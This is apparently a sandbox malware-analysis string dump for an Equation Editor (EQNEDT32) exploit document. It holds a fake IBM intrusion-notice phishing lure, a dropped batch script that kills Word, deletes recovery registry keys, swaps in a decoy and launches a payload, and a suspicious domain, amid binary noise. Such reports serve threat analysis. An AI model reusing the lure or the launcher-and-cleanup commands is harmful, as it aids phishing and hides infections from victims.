Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Trademark sans serifSummation

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

trol &panel...

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ubscript

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

UCGreek

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

unction . . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

UnhandledException

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

User1

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

User2

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

user32.dll

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

VarFileInfo

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Variable

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

ve, size, or close application window

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Vector

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Version

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

VirtualAlloc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

VirtualFree

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

VS_VERSION_INFO

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

WideCharToMultiByte

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

window is zoomed to its maximum size

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Windows

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

WinExec

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

WordPerfect

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

WordPerfect Document

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

WordPerfect Text

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

wwwwww

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

wwwwwwwwwwwwwwwwwwwwp

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ymbol . . . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ze:Changes typesize directly - without using size definitions

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ZoomDlgProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

zyxwvutsrqponmlkjihg

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

ZYXWVUTSRQPONMLKJIHG

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

{71358FC1-E43B-11D1-A17F-00A0C90AB50F}

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

!"#$%'()*+,-0Root EntryFOz21TableWordDocument.SummaryInformation(DocumentSummaryInformation8&CompObjr

Ansi based on Dropped File (decoy.doc)

'theme/theme/_rels/themeManager.xml.relsM

Ansi based on Dropped File (decoy.doc)

'theme/theme/_rels/themeManager.xml.relsPK]

Ansi based on Dropped File (decoy.doc)

,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!Tctheme/theme/theme1.xmlPK-!

Ansi based on Dropped File (decoy.doc)

----------------------------Cisco Catalyst Log Entry 03.13.2018 EOF----------------------------

Ansi based on Dropped File (decoy.doc)

----------------------------Cisco Catalyst Log Entry 03.13.2018----------------------------

Ansi based on Dropped File (decoy.doc)

.K.W0*lm/Go_W-]mc'XP|<.5uq7R0&H8B4=N<s=qxPVO6||M#/8<~]rT=^/H7!MfZH2Haf!VVX4-,2U,ZF9j&`OYSevU2f

Ansi based on Dropped File (decoy.doc)

01KG=0O B01;8F04

Ansi based on Dropped File (decoy.doc)

0Thgdmh}0Qf{?gdm,1h. A!"R#n$n%

Ansi based on Dropped File (decoy.doc)

0woo&5

Ansi based on Dropped File (decoy.doc)

1*?f8&,8N>hR*"(zsy2!#YQ$\h2>:<xzx,-4qm0-:q_qgNVfD]_dvxL;{v_ZS4S.OtKn[-xus^R ^Rz%^jwWxw]k`2a~9_jSLX,[{>HCA84Bq.UJR_O]-4k!D=zvg?s6reGT{</|N:OWB_?>xo'hGIs;WY;YCDtv<(Fr

Ansi based on Dropped File (decoy.doc)

5B A?8A:0R/Rx03>;>2>: 3 =0:5CJOJPJQJ\aJPK![Content_Types].xmlN0EH-J@%|$ULTB l,3;rJB+$G]7OV<a(7IR{pgL=r85v&uQ8CX=$?6NJCFB.'.+YT^e55 _g -;Yl|6^N`?[PK!6_rels/.relsj0}Q%v/C/}(h"O

Ansi based on Dropped File (decoy.doc)

8PK!Tctheme/theme/theme1.xmlY7w}L~VLha@7q2f=h!$WiUV(R^TUW*UQUWXg2/,+*]iw|9g>{+N8aq-*GlLi63~pmGo

Ansi based on Dropped File (decoy.doc)

; qc?P

Ansi based on Dropped File (decoy.doc)

;D~<t_'H(NiU yb9,a%5]HZ_ww<H7vBw5?

Ansi based on Dropped File (decoy.doc)

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

Ansi based on Dropped File (decoy.doc)

= C?hv=%[xp{_P<1H0ORBdJE4b$q_6LR7`0O,En7Lib/SePK!kytheme/theme/themeManager.xmlM

Ansi based on Dropped File (decoy.doc)

>/1.Ubjbjnn.aa0JLLLLLL:LLaJJ`Oz6w0&@LLmg:

Ansi based on Dropped File (decoy.doc)

@LT\dFijiNormal.dotmFiji17Microsoft Office Word@0@Bu@<z;.+,0hp|

Ansi based on Dropped File (decoy.doc)

@}w7c(EbCA7K

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 30.49.48.1, Tuesday, March 13, 2018 19:54:47

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:11:06

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:13:44

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:21:07

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:30:20

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:36:40

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:38:07

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:59:16

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:13:17

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:21:59

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:25:03

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:32:32

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:37:17

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:42:23

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:56:05

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:56:31

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:58:34

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 37.182.9.32, port 80, Tuesday, March 13, 2018 19:23:16

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 37.182.9.32, port 80, Tuesday, March 13, 2018 19:40:07

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 37.182.9.32, port 80, Tuesday, March 13, 2018 19:53:06

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:11:29

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:13:41

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:44:57

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:50:46

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:57:46

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:16:07

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:22:39

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:23:36

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:28:06

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:32:40

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:42:40

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:44:59

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:53:49

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:56:15

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 20:02:37

Ansi based on Dropped File (decoy.doc)

[DoS Attack: TCP/UDP Chargen] from source: 184.105.139.117, port 15283, Tuesday, March 13, 2018 19:58:53

Ansi based on Dropped File (decoy.doc)

`3Ax&sA,/fvXb9<'O:*B{Yg2A

Ansi based on Dropped File (decoy.doc)

A=>2=>9 H@8DB 0170F0XiX

Ansi based on Dropped File (decoy.doc)

Best regards,

Ansi based on Dropped File (decoy.doc)

e.|,H,lxIsQ}# +!,^$j=GW)E+&

Ansi based on Dropped File (decoy.doc)

E@Sc. 6%pn5$CcT< /ANQxDS#\r""`t\Ss%=tD]1eA

Ansi based on Dropped File (decoy.doc)

F Microsoft Word 97-2003

Ansi based on Dropped File (decoy.doc)

hmhS*NLhmhm5B*CJOJPJQJ\^JaJfHnHph333q

Ansi based on Dropped File (decoy.doc)

IBM Security Department

Ansi based on Dropped File (decoy.doc)

l4a.k .

Ansi based on Dropped File (decoy.doc)

MSWordDocWord.Document.89q

Ansi based on Dropped File (decoy.doc)

Please carefully examine log file sample and take action to prevent harmful traffic coming from your IP space.

Ansi based on Dropped File (decoy.doc)

QXV*MvL$r3IC4Yux\7W)5PV4W8in]h+[P2#4kxj/Sx6IzDYf]4JtR5CIr4XiV +9Hd<HAS~Ol}gJer1Wo1esT5#:QQt1OJs:SSfLejtk7Ds3

Ansi based on Dropped File (decoy.doc)

S*NLsRb_mTnL)H%x@h@UnknownG*AxTimes New Roman5Symbol3.*CxArial7.@CalibriA$BCambria Math"1hb5scg;;!n0KHP$PLsR2!xxFijiFijiOh+'0l

Ansi based on Dropped File (decoy.doc)

S?3~`Yg

Ansi based on Dropped File (decoy.doc)

The following attacks coming from your network space was logged by IBM Intruder Detection System.

Ansi based on Dropped File (decoy.doc)

U]b65y2izO{]rK[']u4jjKF\kIh_[][#:?W-MLiu\g ]x1<TD`C4P{T6%[yBZJ

Ansi based on Dropped File (decoy.doc)

W^B_.u;;XD";Q6LquhS6Y3G2C@tn*fvu;B3u

Ansi based on Dropped File (decoy.doc)

ZPh{jzBVBT^y;6VGu_PK!

Ansi based on Dropped File (decoy.doc)

"%AppPath%"

Ansi based on Dropped File (2nd.bat)

copy %temp%\decoy.doc "%AppPath%"

Ansi based on Dropped File (2nd.bat)

copy %TeMp%\DeCoY.DoC "%AppPath%"

Ansi based on Dropped File (2nd.bat)

DeL %TMp%\block.TxT

Ansi based on Dropped File (2nd.bat)

DeL %TMp%\decoy.DoC

Ansi based on Dropped File (2nd.bat)

DeL %TMp%\inteldriverupd1.ScT

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

start %TeMp%\ExE.ExE

Ansi based on Dropped File (2nd.bat)

taskkill /f /im WiNwOrD.ExE

Ansi based on Dropped File (2nd.bat)

TIMEOUT 1

Ansi based on Dropped File (2nd.bat)

"http://cps.root-x1.letsencrypt.org0<

Ansi based on PCAP Processing (network.pcap)

"http://ocsp.int-x3.letsencrypt.org0/

Ansi based on PCAP Processing (network.pcap)

#http://cert.int-x3.letsencrypt.org/0/

Ansi based on PCAP Processing (network.pcap)

&http://isrg.trustid.ocsp.identrust.com0;

Ansi based on PCAP Processing (network.pcap)

+http://crl.identrust.com/DSTROOTCAX3CRL.crl0

Ansi based on PCAP Processing (network.pcap)

/http://apps.identrust.com/roots/dstrootcax3.p7c0

Ansi based on PCAP Processing (network.pcap)

160317164046Z

Ansi based on PCAP Processing (network.pcap)

180307211456Z

Ansi based on PCAP Processing (network.pcap)

180605211456Z0

Ansi based on PCAP Processing (network.pcap)

210317164046Z0J1

Ansi based on PCAP Processing (network.pcap)

Digital Signature Trust Co.1

Ansi based on PCAP Processing (network.pcap)

dns-verifon

Ansi based on PCAP Processing (network.pcap)

dns-verifon.com

Ansi based on PCAP Processing (network.pcap)

dns-verifon.com0

Ansi based on PCAP Processing (network.pcap)

DST Root CA X30

Ansi based on PCAP Processing (network.pcap)

hostmaster

Ansi based on PCAP Processing (network.pcap)

http://cps.letsencrypt.org0

Ansi based on PCAP Processing (network.pcap)

Let's Encrypt Authority X30

Ansi based on PCAP Processing (network.pcap)

Let's Encrypt1#0!

Ansi based on PCAP Processing (network.pcap)

pMJci(EX

Ansi based on PCAP Processing (network.pcap)

This Certificate may only be relied upon by Relying Parties and only in accordance with the Certificate Policy found at https://letsencrypt.org/repository/0

Ansi based on PCAP Processing (network.pcap)

www.dns-verifon.com0

Ansi based on PCAP Processing (network.pcap)

"Hw"w P^O;<aY`GkxmPY[g

Ansi based on Dropped File (~WRC0000.tmp)

#;[6YIWZU+3~k

Ansi based on Dropped File (~WRC0000.tmp)

$9z5YO1e:Lm6'XkzkU6Jyr|fl_0m b'xkfnzxURc@pa&=zQytPm_+/36{(Z* jY1CAAx;yE7U:h|&.Hi)z6`>zucUc;W1s zikUACgqpUC4{NL~KY62icyk63f

Ansi based on Dropped File (~WRC0000.tmp)

$^<wr=ocwwww6;K}=#w>\&!xf.p/qOXkp8Hjgu=O]V<4%^Tc7PK-!+:P[Content_Types].xmlPK-!N_rels/.relsPK-!-t:M0word/_rels/document.xml.relsPK-!word/document.xmlPK-!0C)word/theme/theme1.xmlPK-!-

Ansi based on Dropped File (~WRC0000.tmp)

%JSjDts|5

Ansi based on Dropped File (~WRC0000.tmp)

%PK!$;word/glossary/styles.xmlQS8o4$4P^i9J`m,@?V06wi:}>"RKDHK_ Xb?oNtT$d2V$~v"%AId?P% ka2;<<3ld(>p4L`Qz+wvGvhPh

Ansi based on Dropped File (~WRC0000.tmp)

%r,!oE7FCy#`9L 2=X2y#pu2vFT'o

Ansi based on Dropped File (~WRC0000.tmp)

%sD Br^gXG%X4)2S,`x%iSswN[3T@w8

Ansi based on Dropped File (~WRC0000.tmp)

&7q8M#8M

Ansi based on Dropped File (~WRC0000.tmp)

'U8\qV.9jZ$MJCgq8`

Ansi based on Dropped File (~WRC0000.tmp)

(Rn4Ju*>6f\jid1a"iPe=X]2O

Ansi based on Dropped File (~WRC0000.tmp)

(tr;"P}&z~6p;Sa/KO09X"ByEVnan[mN[}$*1L-'%/!FN3\C`9zO+.|6RLLe+{=w/t.^yXgp}H,3|zA(y2(p8

Ansi based on Dropped File (~WRC0000.tmp)

)!crp-bgandfPyPenqzLeq5$d"fzR_Xv=Z[jY<;9+ZJ2X

Ansi based on Dropped File (~WRC0000.tmp)

)tn{elf%^8^];dH

Ansi based on Dropped File (~WRC0000.tmp)

-+[o^IJq,Mvm2M]alZ>U;2=XR[ dgF]I}Q%F~DkB]-Pg6T]>T}fsbHx^(]>\<[v-kkL !I*^' |Ctw6-%'N2X"7= D'Xj"u`Pj.C>Q|

Ansi based on Dropped File (~WRC0000.tmp)

-v"YmR04hYW8hGyfz',I9}a])c~wrr;@P+-PuQPVgU

Ansi based on Dropped File (~WRC0000.tmp)

.-;J+;F>hXdB%?y\MCG-ayVf&eBn(5&NI`V7rb*<GqGO,68M7p;PU 6X+fT=v&Pj7NxX'j,'u8M#8M#8M

Ansi based on Dropped File (~WRC0000.tmp)

.\-/n*x]+8lq!P1lf><DX,|8h((6|e_,\7}V1}D>}<=G>UgJ&tTa

Ansi based on Dropped File (~WRC0000.tmp)

.us>b=,[_PsP'|u>^^W3T$1SUBRq$0op?PK!:word/webSettings.xmln0UvTQ8lBB`ZBJ~inq>S9K1%

Ansi based on Dropped File (~WRC0000.tmp)

0u:o@P]H'!3}e'*n+i Z z

Ansi based on Dropped File (~WRC0000.tmp)

1WsH=O^QN+T)Ep!BTETxBEG}h\fq/U~&e~cMc,9&J!.u.RB>B.A|p^owJH{.6K2/lS8qQ

Ansi based on Dropped File (~WRC0000.tmp)

2<S1V/

Ansi based on Dropped File (~WRC0000.tmp)

2FhsF+Y\n:3E[69`&45Z!*5k8`Fmw-"d>zn"ZxJZp;{/<P;,)''KQk5qpN8KGbe

Ansi based on Dropped File (~WRC0000.tmp)

3K4'+rzQ

Ansi based on Dropped File (~WRC0000.tmp)

42@J!k&!#ayV+#MeBn(5&NunX-U=FUM8UP x4x@74x@2xXlm(5*_M]/#7PSvtW8PcRG`#8M#8M#p'[JM7To_hAY@a)

Ansi based on Dropped File (~WRC0000.tmp)

6J+q<b?{JIx#5t0Fbnud<F}F(j(iQa~T<,22HVlt`lW'__0/Y;x'gJBp=i;GD]:g1_Ht<:?W|PK!kldocProps/app.xml (RMo0Ozi&d&>n-M$ sN-'~y~fOER1BG[>*Q0 [DSPR0[J]&x`xh*FB}/iee6`%vN=.6

Ansi based on Dropped File (~WRC0000.tmp)

7_?m-{UBw<w_$#[8{(/$0hF{L)#7i%=A:s$),Qg20ppf

Ansi based on Dropped File (~WRC0000.tmp)

8A8LJ $zr10X<zCR/|TOS=#k*6"6xj]wkJo~^s+"}PK!GVm|word/glossary/document.xmlYMo8/=0D}ni*PI$9#Yrh6)FrpH|<>R/?Mfagb.r5w:MEizm$VtSTtMM6EYZ.S\f^z1RU4

Ansi based on Dropped File (~WRC0000.tmp)

8cT;?t.bt{c9GK$+0?C~Se6X~.!;[rTu!]19X"|PJf]M

Ansi based on Dropped File (~WRC0000.tmp)

8T~;Y`']O4G

Ansi based on Dropped File (~WRC0000.tmp)

9;^f&5ZDZF{J7 @D4x#@74x#@2x#XdmZoHBU]7i+

Ansi based on Dropped File (~WRC0000.tmp)

9AMFPioKBJ5x#@74x#@74x#@2x#XdmZo,ToHBWoox#(nR,rj,+~RK7%q8#8

Ansi based on Dropped File (~WRC0000.tmp)

;:5A-;@5V)Iqj&x4x@74x@2xXlm(5*[JPU 6o]vMSR,vjR,M+q<G#8M

Ansi based on Dropped File (~WRC0000.tmp)

;;(52<b1Xb)Ukny

Ansi based on Dropped File (~WRC0000.tmp)

;@M&P{I%xX'

Ansi based on Dropped File (~WRC0000.tmp)

;B<";e3y#S(C!oP?N 7

Ansi based on Dropped File (~WRC0000.tmp)

<06?*_~.?PK!(^=word/stylesWithEffects.xmlmS8}CH4P3m60Z|~ pV;wcUcoWa<$2Z'}=,GNg}^KSD6&$6<dq(Dr{2Zx|?LOOq"=@bK\&ck-eL&!K,+lfp:\I#=\3ZzyL'8)]z

Ansi based on Dropped File (~WRC0000.tmp)

<^'CT#

Ansi based on Dropped File (~WRC0000.tmp)

=k<*2KrhG#

Ansi based on Dropped File (~WRC0000.tmp)

>1E?nb_~bm@

Ansi based on Dropped File (~WRC0000.tmp)

@"CzyTy

Ansi based on Dropped File (~WRC0000.tmp)

[Yyj2> U^4^2XKqA[Z,l9ry+|.-?#[r]v;xY`u[Hm'3Fr)PK!^word/glossary/fontTable.xmlA0"8!lhjEKq<)8@1?4 HhnR

Ansi based on Dropped File (~WRC0000.tmp)

\*/UTz`mTqAStne{uFLY#Gbt.gi<s~|p[21_ L|o'Ld}|kOr:c> $O%:$YRPK!712qdocProps/core.xml (RAn0W"BUV7^%-}Rwgv4;lr

Ansi based on Dropped File (~WRC0000.tmp)

\}DU4p

Ansi based on Dropped File (~WRC0000.tmp)

]yA%h0>UH=}Vx!#YAOi%E$K[|

Ansi based on Dropped File (~WRC0000.tmp)

^Gz(@p-k7+7

Ansi based on Dropped File (~WRC0000.tmp)

`zI"~gcRHc#_Q0bG'|OJ:m)DD{j!3&FGG$Sg#AJ\bXkW'|GJsN[N4'!

Ansi based on Dropped File (~WRC0000.tmp)

AgPj@

Ansi based on Dropped File (~WRC0000.tmp)

AuFS!TK,*XX7HfgF)',FXy#w;H"s2y#`"sgESG

Ansi based on Dropped File (~WRC0000.tmp)

Ay[Z|`nmsT79x<.

Ansi based on Dropped File (~WRC0000.tmp)

C3&L&oI{Ixr~,Xxw#\b\eV|,>*wwPkXR0H4;"A5Vo+?H` ^YyL8Hok"=YU'5]Av:5&iBpM. / M'&

Ansi based on Dropped File (~WRC0000.tmp)

D]=^`_`}B26'YGLrBPK!Mword/fontTable.xmlMn0z9"=MSQo)+#J!<|x/)*!|H;

Ansi based on Dropped File (~WRC0000.tmp)

dXiJ(x$(:;!I_TS1?E??ZBmU/?~xY'y5g&/>GMGeD3Vq%'#q$8K)fw9:

Ansi based on Dropped File (~WRC0000.tmp)

EO/)F;@Z$I2Uz<uLULhd6Xwf#3;"e3Y.s&KS[nA2{

Ansi based on Dropped File (~WRC0000.tmp)

f^]Y-.CDtv5w>AvjW0zt*yPkGaJaxoI ;@"r+6

Ansi based on Dropped File (~WRC0000.tmp)

fao.b*lIrj),l0%b

Ansi based on Dropped File (~WRC0000.tmp)

Fd` # h1

Ansi based on Dropped File (~WRC0000.tmp)

FX)bkENi0C^P7z`E<)G]9/gI4g<eI["4m?6qkb0S#jpI |wXPK!N_rels/.rels (JAa}7

Ansi based on Dropped File (~WRC0000.tmp)

G;7A["&{)TKs u>4SUvI7q6&tp/`#34#6*UOj&=S|y8}QjDzG4wDFzG4JwDzG4;tvz@-;'{n:PV=$,8epj9=\,Y"vgF;{&

Ansi based on Dropped File (~WRC0000.tmp)

gHjo6UC@l]"Zpc#._fReK+/22t+#V7ZD/,j0&BOi`|a@@8*^>^Q%rjc,e+='GU.k&x=&XHd%=

Ansi based on Dropped File (~WRC0000.tmp)

Gino/<<1A$>"f3\TISWY

Ansi based on Dropped File (~WRC0000.tmp)

ig@X6_]7~

Ansi based on Dropped File (~WRC0000.tmp)

jC^;>0Tc-^4L

Ansi based on Dropped File (~WRC0000.tmp)

K@Nm}/k)FLzc<q(a,.i&6Br{a->79-G.rjs4):S)j(T0!vAAGo14/Yi*jykJ2YAzaN^}H+|:a(t^lXI9A5Yt'LmZ^w9 g.=E\rG;mYyXZQOr<@: 4@-=,,.s2[7^

Ansi based on Dropped File (~WRC0000.tmp)

kCc!oX?I.vO

Ansi based on Dropped File (~WRC0000.tmp)

l|Go:Ht<y%f.Kul16Z=I0{L`HS\CCop#O:7SiVP]KGrh$BFtZy]O+,{juZqBiit,$-my{q7HJL{PE/Fq$>

Ansi based on Dropped File (~WRC0000.tmp)

M4|/99:4j>PK!l~5%word/glossary/_rels/document.xml.relsMO0H(wn|

Ansi based on Dropped File (~WRC0000.tmp)

M9;c:}tQY}qdF!Vd!57~m$

Ansi based on Dropped File (~WRC0000.tmp)

mUa#eFh$MFhDFhwD##(\,j6caw

Ansi based on Dropped File (~WRC0000.tmp)

M{DB%J+{lC]=5

Ansi based on Dropped File (~WRC0000.tmp)

N'2ufG

Ansi based on Dropped File (~WRC0000.tmp)

N6/dok`

Ansi based on Dropped File (~WRC0000.tmp)

ndVgqr^L8T2$tzv^\8D,e$|I(m,

